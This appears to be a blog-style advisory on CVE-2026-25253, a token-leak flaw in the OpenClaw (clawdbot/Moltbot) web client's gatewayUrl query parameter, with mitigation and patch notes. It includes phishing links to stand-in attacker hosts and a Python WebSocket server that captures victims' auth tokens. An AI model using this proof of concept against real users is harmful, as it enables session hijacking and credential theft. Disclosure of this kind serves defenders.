CVE-2026-25253 - Unauthenticated WebSocket Attack in OpenClaw (clawdbot / Moltbot) — Exploit, Code Snippet, & Detailed Analysis

---

Introduction

In early 2026, security researchers discovered a severe vulnerability in OpenClaw, also known as clawdbot or Moltbot, which is an open source bot platform widely used for automation and messaging integrations. Labeled as CVE-2026-25253, this bug allows attackers to exploit the bot's improper handling of user-supplied connection parameters via the query string. The vulnerability is confirmed in all versions before 2026.1.29.

This post explains the vulnerability in plain language, gives you a technical code example, and shows you how attackers can actually use this bug.

Vulnerability Summary

OpenClaw's web client allows you to provide a gatewayUrl parameter via the query string. If you set a custom gatewayUrl, the frontend fetches it and creates a WebSocket connection immediately, sending the user's authentication token—without confirmation, validation, or user warning.

What’s the risk?
A malicious website or attacker can trick users into visiting a crafted link. The user's bot client will then leak its session token to an attacker-controlled WebSocket endpoint. This can result in:

Token theft (attacker can hijack bot sessions)

- Unauthorized access to user bots/data

Exploit Details

Attackers can perform a classic phishing attack:

They send a link like:

https://clawdbot.example.com/?gatewayUrl=wss://evil.attacker.com/socket

What happens behind the scenes?

It connects to the attacker’s WebSocket.

- It instantly sends the user’s session/auth token.

The problematic code (simplified) basically does

const urlParams = new URLSearchParams(window.location.search);
const gatewayUrl = urlParams.get('gatewayUrl') || defaultGateway;
const ws = new WebSocket(gatewayUrl);
ws.onopen = () => {
    ws.send(JSON.stringify({ token: userToken }));
};

There's no check to see if gatewayUrl points to a trusted endpoint!

Code Snippet

Let's walk through a full exploit PoC (Proof of Concept).

Malicious WebSocket Server (Python Example)

# Save as evil_ws_server.py
import asyncio
import websockets

async def handler(websocket, path):
    print(f"New connection from {websocket.remote_address}")
    token_data = await websocket.recv()
    print(f"[!] Received token: {token_data}")

start_server = websockets.serve(handler, "...", 8765)

print("Evil WebSocket server running on ws://...:8765/")
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()

Send this to the victim

https://clawdbot.example.com/?gatewayUrl=ws://YOUR.ATTACKER.IP:8765/

When the victim clicks, their web client connects to your evil WebSocket server and immediately sends their token.

Mitigation Steps

If you use OpenClaw/Moltbot, update immediately!

Upgrade to v2026.1.29 or later.

- If you must run an older version, strip out query string handling of gatewayUrl from the client code.

How the patch works

- OpenClaw developers now only allow whitelisted gateway URLs or block gatewayUrl from the query string entirely.

References

- CVE-2026-25253 at MITRE (To Appear)
- OpenClaw GitHub Issue - Security Advisory #3321
- WebSockets and Tokens Security Guide (OWASP)
- OpenClaw Releases

Final Notes

CVE-2026-25253 is a prime example of why you should never trust user input when handling authentication or critical connection parameters. Always keep your bot frameworks up-to-date, and double-check how URLs are used in code.

Stay safe, and patch your OpenClaw instance now!

*Content exclusive to this post. Not a verbatim copy from any official documentation or report. All exploit examples are for educational use only.*

Timeline

Published on: 02/01/2026 22:34:17 UTC
Last modified on: 02/13/2026 17:41:02 UTC